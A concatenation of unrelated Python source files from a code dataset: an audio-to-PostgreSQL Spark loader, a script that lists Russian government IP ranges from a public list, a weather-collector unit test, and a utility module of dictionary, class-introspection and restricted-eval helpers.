tags.composer, tags.disc, tags.disc_total, tags.duration, tags.filesize, tags.genre, tags.samplerate, tags.title, tags.track, tags.track_total, tags.year) # convert tuple object to list indiv_tag_list = list(indiv_tags) indiv_tag_list = [str(i) for i in indiv_tag_list] tag_seq=[] tag_seq.append(indiv_tag_list) tags_pdf = pd.DataFrame(data=tag_seq) tag_df = spark.createDataFrame(tags_pdf, schema=File_Tags) ##### audio # load audio file with Librosa #y, sr = librosa.load(str(Path(local_path)), sr=None) y, sr = librosa.load(local_path, sr=None) # create indexing variables (song_id, timestamp) # song_id defined as "repeat(number_of_files)" song_num = pd.Series([number_of_files]) num_points = len(y) song_id = song_num.repeat(num_points) song_id = song_id.to_numpy() # timeseries defined as "1 : length(audio_data)" timeseries = np.arange(num_points) timeseries = timeseries.transpose() full_audio = {'song_id': song_id, 'timeseries': timeseries, 'intensity': y} # create combined dataframe audio_pdf = pd.DataFrame(data = full_audio) audio_df = spark.createDataFrame(audio_pdf) ##### spectral S = librosa.feature.melspectrogram(y, sr=sr, n_mels=128, fmax=10000) log_S = librosa.power_to_db(S, ref=np.max) log_S = log_S.transpose() # song_id defined as "repeat(number_of_files)" song_num = pd.Series([number_of_files]) num_points = len(S.transpose()) song_id = song_num.repeat(num_points) song_id = song_id.to_numpy() # timeseries defined as "1 : length(audio_data)" timeseries = np.arange(num_points) timeseries = timeseries.transpose() full_index = {'song_id': song_id, 'timeseries': timeseries} index_pdf = pd.DataFrame(full_index) spec_pdf = pd.DataFrame(data=log_S, columns=spec_labels) full_spec = pd.concat([index_pdf, spec_pdf], axis=1) spec_df = spark.createDataFrame(full_spec) ##### write dataframes to psql write_df_to_psql(tag_df, 'clean_metadata') write_df_to_psql(audio_df, 'clean_audio') write_df_to_psql(spec_df, 'clean_spec') # stop process when file_limit is crossed (small batches) if (number_of_files >= file_limit): break ##### time_seq.append(['end read-file', time.time()]) #df_tags = spark.createDataFrame(tag_seq, schema=File_Tags) #df_audio = spark.createDataFrame(audio_seq) #df_spec = spark.createDataFrame(audio_seq, schema=Spec_Tags) # Additional run to #df_audio_data = spark.createDataFrame(file_audio_data) #process_df(df_audio_data) ##### if __name__ == '__main__': time_seq.append(['start', time.time()]) read_audio_files()
2.09375
2
get_ip_list_ru_gov.py
gil9red/SimplePyScripts
117
11827
#!/usr/bin/env python3 # -*- coding: utf-8 -*- __author__ = 'ipetrash' """ Скрипт выводит список ip государственных организаций. """ import ipaddress import sys import requests rs = requests.get('https://jarib.github.io/anon-history/RuGovEdits/ru/latest/ranges.json') # Проверка удачного запроса и полученных данных if not rs or not rs.json() or 'ranges' not in rs.json(): print('Не получилось получить список ip государственных организаций') sys.exit() # Получение и сортировка элементов по названию организации items = sorted(rs.json()['ranges'].items(), key=lambda x: x[0]) ip_counter = 0 for i, (name, ip_network_list) in enumerate(items, 1): print(f'{i}. {name}') # Получение ip с маской подсети for ip_network in ip_network_list: print(f' {ip_network}:') # Получение ip подсети net4 = ipaddress.ip_network(ip_network) # Перебор ip адресов указанной организации for ip in net4.hosts(): print(f' {ip}') ip_counter += 1 print() print('Всего ip:', ip_counter)
2.796875
3
test_collection.py
Rodrun/weatherguess
0
11828
<gh_stars>0 import unittest import requests from collection import Collection class TestCollection(unittest.TestCase): def setUp(self): # Get the sample JSON data self.data = requests.get("http://samples.openweathermap.org/data/2.5/weather?zip=94040,us&appid=b6907d289e10d714a6e88b30761fae22").json() self.coll = Collection(getlist=["weather.main", "main.temp", "clouds.all", "doesntExist"]) self.dcoll = Collection() def test_detect_none(self): """ Test if get_weather returns a list of the default value when given None. """ self.assertCountEqual([x for x in self.coll.get_weather(None)], [0. for i in range(0, len(self.coll.get_getlist()))]) def test_get_weather(self): """ Test if get_weather functions correctly. """ data = [x for x in self.coll.get_weather(self.data)] self.assertIsInstance(data[0], str) self.assertIsInstance(data[1], float) self.assertIsInstance(data[2], int) self.assertEqual(data[3], 0.) def test_get_weather_defaults(self): """ Test if get_weather functions correctly using the default getlist. """ data = [x for x in self.dcoll.get_weather(self.data)] self.assertIsNotNone(data) print(data)
3.46875
3
tests/bitwiseOperations/__init__.py
mgorzkowski/abn
4
11829
from . import nand_tests from . import and_tests from . import nor_tests from . import not_tests from . import or_tests from . import xor_tests from . import rotate_left_tests from . import rotate_right_tests from . import shift_left_tests from . import shift_right_tests
1.085938
1
exot/util/misc.py
ETHZ-TEC/exot_eengine
0
11830
# Copyright (c) 2015-2020, Swiss Federal Institute of Technology (ETH Zurich) # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright notice, this # list of conditions and the following disclaimer. # # * Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # * Neither the name of the copyright holder nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # """Misc helpers""" import math import random import re import signal import typing as t from datetime import datetime from enum import Enum from functools import reduce from inspect import isabstract from string import ascii_letters from subprocess import list2cmdline as _list2cmdline from typing import Mapping as Map import numpy as np from exot.exceptions import * __all__ = ( "call_with_leaves", "dict_depth", "dict_diff", "find_attributes", "flatten_dict", "get_concrete_subclasses", "get_subclasses", "get_valid_access_paths", "getitem", "has_method", "has_property", "has_type", "has_variable", "is_abstract", "is_scalar_numeric", "leaves", "list2cmdline", "map_to_leaves", "mro_getattr", "mro_hasattr", "random_string", "safe_eval", "sanitise_ansi", "setgetattr", "setitem", "stub_recursively", "unpack__all__", "validate_helper", "get_cores_and_schedules", ) """ Signatures ---------- call_with_leaves :: (function: Callable[[Any], Any], obj: ~T, _seq: bool = True) -> None dict_depth :: (obj: Any, level: int = 0) -> int dict_diff :: (left: Mapping, right: Mapping) -> List[Dict] find_attributes :: (attr: str, klass: Any) -> List flatten_dict :: (obj: Mapping, sep: str = '.') -> Mapping get_concrete_subclasses :: (klass, recursive=True, derived=True) -> List get_subclasses :: (klass, recursive=True, derived=True) -> List get_valid_access_paths :: (obj: Mapping, _limit: int = 8192, _leaf_only: bool = False, _use_lists: bool = True, _fallthrough_empty: bool = True) -> Generator getitem :: (obj: Mapping, query: Union[str, Tuple], *args: Any, sep: str = '/') -> Any has_method :: (klass: Union[type, object], name: str) -> bool has_property :: (klass: Union[type, object], name: str) -> bool has_type :: (klass: Union[type, object]) -> bool has_variable :: (klass: Union[type, object], name: str) -> bool is_abstract :: (klass: Union[type, object]) -> bool is_scalar_numeric :: (value: t.Any) -> bool map_to_leaves :: (function: Callable[[Any], Any], obj: ~T, _seq: bool = True) -> Any mro_getattr :: (cls: type, attr: str, *args: Any) -> Any mro_hasattr :: (cls: type, attr: str) -> bool random_string :: (length: int) -> str safe_eval :: (to_eval: str, expect: Tuple[type], timeout: int) -> object sanitise_ansi :: (value Union[List[str], str]) -> Union[List[str], str] setgetattr :: (klass: Union[type, object], attr: str, default: Any) -> None setitem :: (obj: MutableMapping, query: Tuple, value: Any) -> None stub_recursively :: (obj: ~T, stub: Any = None, _stub_list_elements: bool = True) -> Optional[~T] unpack__all__ :: (*imports: Collection[str]) -> Tuple[str] validate_helper :: (what: Mapping, key: Any, *types: type, msg: str = '') -> NoReturn """ def call_with_leaves(function: t.Callable[[t.Any], t.Any], obj: t.T, _seq: bool = True) -> None: """Calls a function on leaves of an object A leaf is considered to be an object that is not a Mapping (or, when _seq is set, also not a Sequence except a string, which is also a Sequence). Args: function (t.Callable[[t.Any], t.Any]): The callable obj (t.T): The tree-like or sequence-like object _seq (bool, optional): Should sequences be considered?. Defaults to True. """ def inner(obj: t.T) -> t.Any: if isinstance(obj, Map): for v in obj.values(): inner(v) elif _seq and isinstance(obj, (t.List, t.Set)): for v in obj: inner(v) else: return function(obj) inner(obj) def dict_depth(obj: t.Any, level: int = 0) -> int: """Get maximum depth of a dict-like object Args: obj (t.Any): The dict-like object level (int): For internal use only. Defaults to 0. .. note:: The depth of a non-dict-like object is considered to be 0. An empty dict increases the depth if `_empty_increments` is True. Examples: >>> dict_depth(1) # returns 0 >>> dict_depth([1,2,3]) # returns 0 >>> dict_depth({1: 1, 2: 2}) # returns 1 >>> dict_depth({1: {2: {3: 3}}}) # returns 3 >>> dict_depth({1: {2: {3: {}}}}) # returns 4 """ if not isinstance(obj, Map) or not obj: return level return max(dict_depth(v, level + 1) for k, v in obj.items()) def dict_diff(left: Map, right: Map) -> t.List[t.Dict]: """Get the difference between 2 dict-like objects Args: left (Map): The left dict-like object right (Map): The right dict-like object The value returned is a list of dictionaries with keys ["path", "left", "right"] which contain the query path and the differences between the left and right mapping. If a key is missing in either mapping, it will be indicated as a "None". `math.nan` (not-a-number) is used for default values in the comparison because of the property: `math.nan != math.nan`. Simple None cannot be used, since it would not handle keys that both have a value of None. In general, this function might report false-positives for keys that contain the math.nan (or np.nan) value simply due to this property. There is no workaround available. """ left_paths = set(get_valid_access_paths(left, _leaf_only=True, _use_lists=False)) right_paths = set(get_valid_access_paths(right, _leaf_only=True, _use_lists=False)) return list( { "path": path, "left": getitem(left, path, math.nan), "right": getitem(right, path, math.nan), } for path in left_paths.union(right_paths) if getitem(left, path, math.nan) != getitem(right, path, math.nan) ) def find_attributes(klass: t.Any, attr: str) -> t.List: """Find attributes in any of a class'es bases Args: klass (t.Any): The type object attr (str): The attribute Returns: t.List: List of found instances of the attribute in the class hierarchy """ if not isinstance(attr, str): raise TypeError(attr) mro = klass.__mro__ if hasattr(klass, "__mro__") else type(klass).mro() return [attr for base in mro if hasattr(base, attr)] def flatten_dict(obj: Map, sep: str = ".") -> Map: """Flatten a dict to a 1-level dict combining keys with a separator Args: obj (Map): The dict-like object sep (str): The separator used when combining keys. Defaults to ".". Returns: Map: A flattened object of same type as 'obj'. .. warning:: Flattening will enforce all keys to be string-types! `reducer` is a function accepted by the functools.reduce function, which is of form: f(a, b) where _a_ is the accumulated value, and _b_ is the updated value from the iterable. The .items() function produces key-value tuple-pairs. These can be expanded with *, e.g. `*("a", "b")` will expand to `"a", "b"`. This property is used to expand the `kv_pair` below. Example walkthrough on `flatten_dict({'a': 1, 'b': {'c': {'d': 2}}})`: :: `outer` <- obj: {'a': 1, 'b': {'c': {'d': 2}}}, prefix: '' `reducer` <- key: 'a', value: 1 `inner` <- acc: {}, key: 'a', value: 1, prefix: '' `inner` -> {'a': 1} `reducer` -> {'a': 1} `reducer` <- key: 'b', value: {'c': {'d': 2}} `inner` <- acc: {'a': 1}, key: 'b', value: {'c': {'d': 2}}, prefix: '' `outer` <- obj: {'c': {'d': 2}}, prefix: 'b.' `reducer` <- key: 'c', value: {'d': 2} `inner` <- acc: {}, key: 'c', value: {'d': 2}, prefix: 'b.' `outer` <- obj: {'d': 2}, prefix: 'b.c.' `reducer` <- key: 'd', value: 2 `inner` <- acc: {}, key: 'd', value: 2, prefix: 'b.c.' `inner` -> {'b.c.d': 2} `reducer` -> {'b.c.d': 2} `outer` -> {'b.c.d': 2} `inner` -> {'b.c.d': 2} `reducer` -> {'b.c.d': 2} `outer` -> {'b.c.d': 2} `inner` -> {'a': 1, 'b.c.d': 2} `reducer` -> {'a': 1, 'b.c.d': 2} `outer` -> {'a': 1, 'b.c.d': 2} """ if not isinstance(obj, Map): raise TypeError("flatten_dict works only on dict-like types", type(obj)) _t = type(obj) def outer(obj: Map, prefix: str) -> Map: def reducer(accumulator: Map, kv_pair: t.Tuple): return inner(accumulator, *kv_pair, prefix) return reduce(reducer, obj.items(), _t()) def inner(accumulator: Map, key: str, value: t.Any, prefix: str) -> Map: if isinstance(value, Map): return _t(**accumulator, **outer(value, prefix + key + sep)) else: return _t(**accumulator, **_t({prefix + key: value})) return outer(obj, "") def expand_dict(obj: Map, sep: str = ".") -> Map: """Expands a flattened mapping by splitting keys with the given separator Args: obj (Map): The flattened dict-like object to unflatten sep (str, optional): The key separator Raises: TypeError: If wrong type is supplied ValueError: If a non-flat dict is supplied Returns: Map: The expanded mapping object of same type as 'obj'. Example: >>> d = {'a': 1, 'b': 2, 'c.ca': 1, 'c.cb': 2} >>> expand_dict(d) {'a': 1, 'b': 2, 'c': {'ca': 1, 'cb': 2}} """ if not isinstance(obj, Map): raise TypeError("expand_dict works only on dict-like types", type(obj)) if dict_depth(obj) != 1: raise ValueError( "expand_dict works only on flat dict-like types, " "got a mapping of depth: {}".format(dict_depth(obj)) ) def inner(obj): accumulator = type(obj)() for k, v in obj.items(): *head, last = k.split(sep) _ = accumulator # Create missing paths for part in head: if part not in _: _[part] = type(obj)() _ = _[part] _[last] = v return accumulator return inner(obj) def get_concrete_subclasses(klass, recursive: bool = True, derived: bool = True) -> t.List: """Get a list of non-abstract subclasses of a type Args: klass (t.Type): The type object recursive (bool): Should the classes be extracted recursively? Defaults to True. derived (bool): Use the 'derived' property of SubclassTracker-enhanced types? [True] Returns: t.List: A list of concrete subclasses of the type """ from exot.util.mixins import _SubclassTracker as __ if derived and hasattr(klass, __.concrete): return list(getattr(klass, __.concrete)) subclasses = get_subclasses(klass, recursive=recursive) return [k for k in subclasses if not isabstract(k)] def get_subclasses(klass, recursive: bool = True, derived: bool = True) -> t.List: """Get a list of subclasses of a type Args: klass (t.Type): The type object recursive (bool): Should the classes be extracted recursively? Defaults to True. derived (bool): Use the 'derived' property of SubclassTracker-enhanced types? [True] Returns: t.List: A list of concrete subclasses of the type """ from exot.util.mixins import _SubclassTracker as __ if not (hasattr(klass, "__subclasses__") or hasattr(klass, __.derived)): raise TypeError(f"__subclasses__ or {__.derived} attribute missing", klass) if derived: return list(getattr(klass, __.derived)) subclasses = klass.__subclasses__() def walker(k): first, *rest = k if len(rest): walker(rest) if first not in subclasses: subclasses.append(first) if hasattr(first, "__subclasses__"): _ = first.__subclasses__() if len(_): walker(_) if recursive: walker(subclasses) return subclasses def get_valid_access_paths( obj: Map, _limit: int = 8192, _leaf_only: bool = False, _use_lists: bool = True, _fallthrough_empty: bool = True, ) -> t.Generator[t.Tuple, None, None]: """Generate valid key sequences in a dict, optionally including lists Args: obj (Map): The dict-like object _limit (int): Maximum number of paths that can be created with list-like elements. _leaf_only (bool): Provide paths for only the leaves of the mapping. Defaults to True. _use_lists (bool): Provide paths for list-like elements in the mapping. Defaults to True. _fallthrough_empty (bool): Discard empty list- or dict-like elements? Defaults to True. Details: If `_leaf_only` is set, only paths to leaves will be produced, a leaf being a value that is not a mapping (or list). If `_use_lists` is set, lists will also be *recursively* checked for valid paths. if `_fallthrough_empty` is set, an empty dict or list will yield an empty tuple, rendering a parent path. Returns: t.Generator[t.Tuple,None,None]: A generator that yields the access paths (tuples). Examples: >>> # Only leaves: >>> d = {'a1': {'a2': None}, 'b2': None} >>> list(get_valid_access_paths(d, _leaf_only=True)) [('a1', 'a2'), ('b2',)] >>> # All paths: >>> list(get_valid_access_paths(d, _leaf_only=False)) [('a1',), ('a1', 'a2'), ('b2',)] """ def thrower(o: object, t: type, n: str) -> t.NoReturn: if not isinstance(o, t): raise TypeError( f"get_valid_access_paths expected {t!r} for {n!r}, got: {type(o)!r}" ) thrower(obj, Map, "obj") thrower(_limit, int, "_limit") thrower(_leaf_only, bool, "_leaf_only") thrower(_use_lists, bool, "_use_lists") thrower(_fallthrough_empty, bool, "_fallthrough_empty") def inner(obj: t.Union[Map, t.List, t.Set]) -> t.Generator: if _fallthrough_empty and not obj: yield tuple() # if obj is a mapping if isinstance(obj, Map): for k, v in obj.items(): # if the value in obj is also a mapping... if isinstance(v, Map): if not _leaf_only: yield (k,) # ... make a recursive call for vv in inner(v): yield (k,) + vv # if the value in obj is a list... elif _use_lists and isinstance(v, (t.List, t.Set)): # ... first yield the valid path to the key containing the list if v and not _leaf_only: yield (k,) elif not v and _fallthrough_empty: yield (k,) # ... loop through elements, and keep track of indexes for idx, vv in enumerate(v): # if an element is also a mapping or list... if isinstance(vv, (Map, (t.List, t.Set))): # ... make a recursive call for vvv in inner(vv): yield (k,) + (idx,) + vvv else: # ... otherwise yield keypath + idx yield (k,) + (idx,) # if the value is neither a mapping nor a list, yield the key else: yield (k,) # if obj is a list-like sequence if _use_lists and isinstance(obj, (t.List, t.Set)): # might be tricky to generate valid sequences for large lists! if _limit and len(obj) >= _limit: raise ValueError( f"get_key_sequences list limit of {_limit} exceeded: {len(obj)}" ) for idx, v in enumerate(obj): if isinstance(v, (Map, (t.List, t.Set))): for vv in inner(v): yield (idx,) + vv else: yield (idx,) return inner(obj) def getitem(obj: Map, query: t.Union[str, t.Tuple], *args: t.Any, sep: str = "/") -> t.Any: """Get a value from a dict-like object using an XPath-like query, or a tuple-path Accesses an object that provides a dict-like interface using a query: either a tuple representing the path, or a string where consecutive keys are separated with a separator, e.g. "key1/key2". Returns the value of the object at the given key-sequence. Returns a default value if provided, or throws a LookupError. Args: obj (Map): a mapping query (t.Union[str, t.Tuple]): a query path using a separated string or a tuple *args (t.Any): an optional default value, similar to `getattr` sep (str, optional): a separator string used to split a string query path Returns: t.Any: the value stored in obj for the given query, or the default value Raises: LookupError: if query not found and no default value is provided TypeError: if obj is not a mapping, or query is not a str or tuple """ if not isinstance(obj, Map): raise TypeError("'obj' must be an instance of Mapping, e.g. dict", type(obj)) if not isinstance(query, (str, t.Tuple)): raise TypeError("'query' must be a str or a tuple", type(query)) if len(args) > 1: raise TypeError(f"getitem accepts at most 3 positional args, got {len(args)}") _obj = obj # handler for tuple queries if isinstance(query, t.Tuple): _valid = get_valid_access_paths(obj) if query not in _valid: if args: return args[0] else: raise LookupError(f"query {query!r} not found") else: for node in query: _obj = _obj[node] return _obj # handler for string queries else: try: # loop through components in the query, consecutively accessing the mapping for node in query.split(sep): # handle empty nodes in the query, e.g. when query="a///b" -> "a/b" if not node: continue if isinstance(_obj, Map): for k in _obj.keys(): node = type(k)(node) if str(k) == node else node elif isinstance(_obj, (t.List, t.Set)): try: node = int(node) except TypeError: raise LookupError( f"{node} not convertible to int when attempting to access " f"a list {_obj!r}" ) _obj = _obj[node] return _obj except LookupError as Error: if args: return args[0] else: Error.args += (query,) raise def has_method(klass: t.Union[type, object], name: str) -> bool: """Check if a method exists in any of a klass'es bases Args: klass (t.Union[type, object]): The type or object name (str): The name of the method Returns: bool: True if has a method with the given name. """ candidates = find_attributes(klass, name) if not candidates: return False def is_callable(c): return isinstance(getattr(klass, str(c), None), t.Callable) return all(is_callable(f) for f in candidates) def has_property(klass: t.Union[type, object], name: str) -> bool: """Check if a variable exists in any of a klass'es bases Args: klass (t.Union[type, object]): The type or object name (str): The name of the property Returns: bool: True if has a property with the given name. """ candidates = find_attributes(klass, name) if not candidates: return False def is_property(c): return not isinstance(getattr(klass, str(c), None), property) return all(is_property(f) for f in candidates) def has_type(klass: t.Union[type, object]) -> bool: """Check if a type or instance has a Type member type that derives from Enum Args: klass (t.Union[type, object]): The type or object Returns: bool: True if has the "Type" attribute. """ if not isinstance(klass, (type, object)): raise TypeError(klass) return issubclass(getattr(klass, "Type", type(None)), Enum) def has_variable(klass: t.Union[type, object], name: str) -> bool: """Check if a variable exists in any of a klass'es bases Args: klass (t.Union[type, object]): The type or object name (str): The name of the variable Returns: bool: True if has a variable with the given name. """ candidates = find_attributes(klass, name) if not candidates: return False def is_not_callable(c): return not isinstance(getattr(klass, str(c), None), t.Callable) return all(is_not_callable(f) for f in candidates) def is_abstract(klass: t.Union[type, object]) -> bool: """Check if a type or instance is abstract Args: klass (t.Union[type, object]): The type or object Returns: bool: True if the type/instance is abstract. """ if not isinstance(klass, (type, object)): raise TypeError(klass) if hasattr(klass, "__abstractmethods__"): return 0 != len(getattr(klass, "__abstractmethods__")) else: from inspect import isabstract return isabstract(klass) def is_scalar_numeric(value: t.Any) -> bool: """Check if is an int, a float, or a NumPy variant thereof Args: value (t.Any): The value to inspect Returns: bool: True if scalar and numeric. """ return isinstance(value, (float, int, np.integer, np.floating)) def leaves(obj: Map) -> t.Generator: """Get leaves of a mapping Args: obj (Map): The dict-like object Returns: t.Generator: A generator that yields the leaf elements of the mapping. """ paths = get_valid_access_paths(obj, _leaf_only=True, _use_lists=False) return (getitem(obj, path) for path in paths) def list2cmdline(seq: t.Iterable) -> str: """Translates a sequence of arguments into a command line string with "None" removal Args: seq (t.Iterable): The sequence of arguments Returns: str: The command-line string """ seq = [_ for _ in seq if _ is not None] return _list2cmdline(seq) def map_to_leaves(function: t.Callable[[t.Any], t.Any], obj: t.T, _seq: bool = True) -> t.Any: """Map a function to leaves of an object A leaf is considered to be an object that is not a Mapping (or, when _seq is set, also not a Sequence except a string, which is also a Sequence). Args: function (t.Callable[[t.Any], t.Any]): a function or signatude "a -> a" obj (t.T): a dict-like, list-like, or plain object _seq (bool, optional): map on elements of lists? Returns: t.T: the obj with transformed elements """ def inner(obj: t.T) -> t.Any: if isinstance(obj, Map): return type(obj)({k: inner(v) for k, v in obj.items()}) elif _seq and isinstance(obj, (t.List, t.Set)): return type(obj)(inner(v) for v in obj) else: return function(obj) return inner(obj) def mro_getattr(cls: type, attr: str, *args: t.Any) -> t.Any: """Get an attribute from a type's class hierarchy Args: cls (type): The type attr (str): The attribute *args (t.Any): The default value (like in Python's default getattr) Returns: t.Any: The attribute, or when not found the default value (if provided) Raises: TypeError: Not called on a type TypeError: Wrong number of arguments AttributeError: Attribute not found and no default value provided """ if not isinstance(cls, type): raise TypeError(f"mro_getattr can only be used on types, got {type(cls)}") if len(args) > 1: raise TypeError(f"mro_getattr expected at most 3 arguments, got {2 + len(args)}") for klass in cls.mro()[1:]: if hasattr(klass, attr): # return first matching attribute return getattr(klass, attr) if args: # if provided, return args[0], i.e. the a default value return args[0] else: raise AttributeError(f"type object {cls.__name__!r} has not attribute {attr!r}") def mro_hasattr(cls: type, attr: str) -> bool: """Check if an attribute exists in a type's class hierarchy Args: cls (type): The type attr (str): The attribute Returns: bool: True if has the attribute. Raises: TypeError: Not called on a type """ if not isinstance(cls, type): raise TypeError(f"mro_getattr can only be used on types, got {type(cls)}") for klass in cls.mro()[1:]: if hasattr(klass, attr): return True return False def random_string(length: int) -> str: """Make a random string of specified length Args: length (int): The desired random string length Returns: str: The random string """ assert isinstance(length, int), f"'length' must be an int, got: {type(length)}" return "".join(random.choices(ascii_letters, k=length)) def timestamp() -> str: """Make a timestamp with current time Returns: str: The timestamp in ISO format """ return datetime.now().isoformat("_", timespec="seconds").replace(":", "-") def safe_eval( to_eval: str, *, expect: t.Tuple[type] = (list, np.ndarray), timeout: int = 10 ) -> object: """Evaluate a restricted subset of Python (and numpy) from a string Args: to_eval (str): The string to evaluate expect (t.Tuple[type]): The list of expected resulting types. Defaults to list, ndarray. timeout (int): The timeout after which the call fails in seconds. Defaults to 10. The `safe_eval` function allows using a subset of commands, listed in `_globals` and `_locals`, which includes a few numpy functions: linspace, arange, array, rand, and randint. Examples: >>> safe_eval("linspace(1, 10, 10, dtype=int).tolist()") [1, 2, 3, 4, 5, 6, 7, 8, 9, 10] >>> safe_eval("__import__('os').getcwd()") NameError Traceback (most recent call last) ... NameError: name '__import__' is not defined >>> safe_eval("range(5)") TypeError Traceback (most recent call last) ... TypeError: eval produced a <class 'range'>, expected: (<class 'list'>, <class 'numpy.ndarray'>) >>> safe_eval("list(round(rand(), 2) for _ in range(5))") [0.96, 0.41, 0.9, 0.98, 0.02] """ assert isinstance(to_eval, str), "'to_eval' must be a str" assert isinstance(expect, tuple), "'expect' must be a tuple" assert all(isinstance(_, type) for _ in expect), "'expect' must contain only types" _locals = {} _globals = { "__builtins__": {}, "list": list, "range": range, "len": len, "int": int, "float": float, "min": min, "max": max, "round": round, "linspace": np.linspace, "geomspace": np.geomspace, "logspace": np.logspace, "hstack": np.hstack, "vstack": np.vstack, "split": np.split, "arange": np.arange, "array": np.array, "rand": np.random.rand, "randint": np.random.randint, } class AlarmException(Exception): pass def signal_handler(number: int, frame): assert number == signal.SIGALRM.value raise AlarmException() signal.signal(signal.SIGALRM, signal_handler) signal.alarm(timeout) try: _ = eval(to_eval, _globals, _locals) except AlarmException: raise TimeoutError(f"safe_eval took longer than {timeout} seconds") else: signal.signal(signal.SIGALRM, signal.SIG_IGN) signal.alarm(0) if not isinstance(_, expect): raise EvalTypeError(f"eval produced a {type(_)}, expected: {expect}") return _ def sanitise_ansi(value: t.Union[t.List[str], str]) -> t.Union[t.List[str], str]: """Remove all ANSI escape characters from a str or a list of str Args: value (t.Union[t.List[str], str]): The string or list of strings Returns: t.Union[t.List[str], str]: The sanitised string or a list of sanitised strings """ _ansi_escape = re.compile(r"(\x9B|\x1B\[)[0-?]*[ -\/]*[@-~]") if isinstance(value, str): return _ansi_escape.sub("", value) elif isinstance(value, t.List): return list(map(lambda x: _ansi_escape.sub("", x).strip(), value)) else: raise TypeError("sanitise_ansi accepts only str or lists of str") def setgetattr(klass: t.Union[type, object], attr: str, default: t.Any) -> None: """Combines `setattr` and `getattr` to set attributes Args: klass (t.Union[type, object]): The type or object attr (str): The attribute default (t.Any): The default value """ if not any([isinstance(klass, type), isinstance(klass, object)]): raise TypeError("'klass' should be a type or an object", klass) if not isinstance(attr, str): raise TypeError("'attr' should be a str") if not attr: raise ValueError("'attr' should not be empty") setattr(klass, attr, getattr(klass, attr, default)) def setitem(obj: t.MutableMapping, query: t.Tuple, value: t.Any, force: bool = False) -> None: """Set a value in a dict-like object using a tuple-path query Args: obj (t.MutableMapping): a mutable mapping query (t.Tuple): a query path as a tuple value (t.Any): value to set Raises: TypeError: if obj is not a mutable mapping """ if not isinstance(obj, t.MutableMapping): raise TypeError("'obj' needs to be a mutable mapping", type(obj)) _obj = obj _valid = get_valid_access_paths(obj) if query not in _valid: if not force: raise KeyError(f"query-path {query!r} not found") else: for node in query[:-1]: if node not in _obj: _obj = dict() _obj = _obj[node] else: for node in query[:-1]: _obj = _obj[node] _obj[query[-1]] = value def stub_recursively( obj: t.T, stub: t.Any = None, _stub_list_elements: bool = True ) -> t.Optional[t.T]: """Produce a copy with all leaf values recursively set to a 'stub' value Args: obj (t.T): the object to stub stub (t.Any, optional): the value to set the leaf elements to _stub_list_elements (bool, optional): stub individual elements in collections? Returns: (t.T, optional): the stubbed object """ def inner(obj): if isinstance(obj, Map): return type(obj)((k, inner(v)) for k, v in obj.items()) elif _stub_list_elements and isinstance(obj, (t.List, t.Set)): return type(obj)(inner(v) for v in obj) else: return stub return inner(obj) def unpack__all__(*imports: t.Collection[str]) -> t.Tuple[str]: """Upacks a list of lists/tuples into a 1-dimensional list Args: *imports (t.Collection[str]): The collections of strings in "__all__" Returns: t.Tuple[str]: The flattened imports as a tuple of strings. """ from itertools import chain _name = f"{__name__}.unpack__all__" if not all(isinstance(e, (t.List, t.Tuple)) for e in imports): raise TypeError(f"{_name}: arguments should be lists or tuples") _ = chain(*imports) assert all( issubclass(type(e), str) for e in _ ), f"{_name}: values in unpacked containers were not scalar or 'str'" return tuple(_) def validate_helper(what: t.Mapping, key: t.Any, *types: type, msg: str = "") -> t.NoReturn: """Validate types of key in a mapping using key-paths Args: what (t.Mapping): The mapping key (t.Any): The key *types (type): The valid types msg (str): An additional error message. Defaults to "". """ if not isinstance(what, t.Mapping): raise TypeError(f"validate_helper works only on mappings, got {type(what)}") if not types: raise TypeError(f"validate helper expects at least 1 'types' argument") if isinstance(key, str) or not isinstance(key, t.Iterable): key = tuple([key]) elif not isinstance(key, tuple): key = tuple(key) # The `config` property setter guarantees that `config` is a fully # mutated AttributeDict, therefore :meth:`getattr` can be used. if not isinstance(getitem(what, key, None), types): raise MisconfiguredError( "{0}config key: '{1!s}' should be of type {2!r}, got {3!s}".format( f"{msg} " if msg else "", key, types, type(getitem(what, key, None)) ) ) def get_cores_and_schedules(environments_apps_zones: t.Mapping) -> set: e_a_z = environments_apps_zones _cores_and_schedules = set() for env in e_a_z: for app in e_a_z[env]: if app != "src": continue _path_to_cores = ("app_config", "generator", "cores") _path_to_schedule_tag = ("zone_config", "schedule_tag") access_paths = list(get_valid_access_paths(e_a_z[env][app])) if _path_to_cores not in access_paths: raise LayerMisconfigured( f"{env!r}->{app!r} must have a 'generator.cores' config key" ) if _path_to_schedule_tag not in access_paths: _ = e_a_z[env][app]["zone"] raise LayerMisconfigured( f"{env!r}.{_!r} of app {app!r} must have a schedule_tag" ) _cores_and_schedules.add( ( len(getitem(e_a_z[env][app], _path_to_cores)), getitem(e_a_z[env][app], _path_to_schedule_tag), ) ) return _cores_and_schedules
1.257813
1
70_question/dynamic_programming/max_profit_with_k_transactions.py
alvinctk/google-tech-dev-guide
26
11831
